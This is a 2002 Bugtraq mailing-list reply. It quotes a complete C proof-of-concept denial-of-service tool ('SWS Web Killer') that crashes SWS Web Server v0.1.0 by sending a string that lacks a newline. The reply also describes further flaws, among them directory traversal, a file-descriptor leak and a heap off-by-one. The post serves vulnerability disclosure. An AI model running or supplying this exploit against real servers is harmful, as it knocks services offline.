Re: SWS Web Server v0.1.0 Exploit

[3APA3A <3APA3A () SECURITY NNOV RU>]

Dear saman () hush com,

I  don't believe this is largest problem of this "webserver"... There is
a lot of others:

1. Directory traversal (../) (it never drops root priveleges it needs to
bind to TCP/80).
2. It never closes file descriptor for 404 document, so it can be used to
DoS remote  system  completely  by  repeating  request  to nonexistent
document..
3. It allows only 1 connection in time and never timeouts.
4.  If recv() fails it will overwrite 1 byte before allocated buffer and
repeat  previous  query.  If  first recv() fails it will try to do some
action on uninitialized heap data.

One  should  be  completely nuts to use it because there's too many bugs
for 130 lines of code :)

--Monday, September 2, 2002, 10:04:23 PM, you wrote to bugtraq () securityfocus org:


shc> -----BEGIN PGP SIGNED MESSAGE-----
shc> Hash: SHA1

shc> /*
shc>  * Mon Sep  2 17:45:04 2002
shc>  *
shc>  * |SaMaN| aka Mert <saman () hush com>
shc>  *
shc>  * Information  : Anyone can kill SWS Web Server v0.1.0 remotely.
shc>  *
shc>  * Proof of Concept Exploit for SWS Web Server v0.1.0
shc>  *
shc>  * SWS homepage : http://www.linuxprogramlama.com
shc>  *
shc>  * Tested on    : Slackware 8.1 - 2.4.18
shc>  *              : Redhat 7.0    - 2.2.16-22
shc>  *
shc>  * Problem      : sws_web_server.c
shc>  *              : line 108
shc>  *              : if (recvBuffer[i - 1] != '\n') break;
shc>  *
shc>  * Q : So what will happen when we send a string not end with '\n' ?
shc>  * A : break break break
shc>  * Q : So root should restart web server everytime ?
shc>  * A : Yes
shc>  * Q : Other web servers act like this ?
shc>  * A : No
shc>  * Q : So something is wrong ?
shc>  * A : Yes :)
shc>  *
shc> */

shc> #include <stdio.h>
shc> #include <stdlib.h>
shc> #include <unistd.h>
shc> #include <errno.h>
shc> #include <string.h>
shc> #include <netdb.h>
shc> #include <sys/types.h>
shc> #include <netinet/in.h>
shc> #include <sys/socket.h>

shc> #define K  "\033[1;31m"
shc> #define Y  "\033[1;32m"
shc> #define SA "\033[1;33m"
shc> #define M  "\033[1;34m"

shc> #define PORT 80

shc> int main(int argc, char *argv[])
shc> {
shc>    int sockfd, numbytes;
shc>    struct hostent *adres;
shc>    struct sockaddr_in hedef;

shc>    char buf[8] = "|SaMaN|";

shc>    if (argc != 2) {
shc>       printf("%s=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n", K);
shc>       printf("%sSWS Web Killer (saman () hush com)  \n", SA);
shc>       printf("%s=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n", K);
shc>       printf("%sUsage: ./sws_web_killer %s<IP>   \n",Y,M);
shc>       return 0;
shc>    }

shc>    if ((adres=gethostbyname(argv[1])) == NULL) {
shc>       perror("gethostbyname");
shc>       exit(1);
shc>    }

shc>    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
shc>       perror("socket");
shc>       exit(1);
shc>    }

shc>    hedef.sin_family = AF_INET;
shc>    hedef.sin_port = htons(PORT);
shc>    hedef.sin_addr = *((struct in_addr *)adres->h_addr);
shc>    memset(&(hedef.sin_zero), '\0', 8);

shc>    if (connect(sockfd, (struct sockaddr *)&hedef,
shc>                                      sizeof(struct sockaddr)) == -1)
shc>    {
shc>         perror("connect");
shc>         exit(1);
shc>    }

shc>    if ((numbytes=send(sockfd, buf, strlen(buf), 0)) == -1) {
shc>         perror("send");
shc>         exit(1);
shc>    }

shc>    close(sockfd);

shc>    return 0;
shc> }


shc> -----BEGIN PGP SIGNATURE-----
shc> Version: Hush 2.1
shc> Note: This signature can be verified at https://www.hushtools.com

shc> wlYEARECABYFAj1zqVwPHHNhbWFuQGh1c2guY29tAAoJEAH/SwbH8cXFjRIAniyG5sTp
shc> 9dPQOfCYbPdtlwHYawc8AKCSvQ23yBZszI97DmMt+maxaqgqOg==
shc> =tmWT
shc> -----END PGP SIGNATURE-----




shc> Get your free encrypted email at https://www.hushmail.com


-- 
~/ZARAZA
Таким образом этот путь дешевле и к нему легче добраться
тому, кто в состоянии до него добраться. (Твен)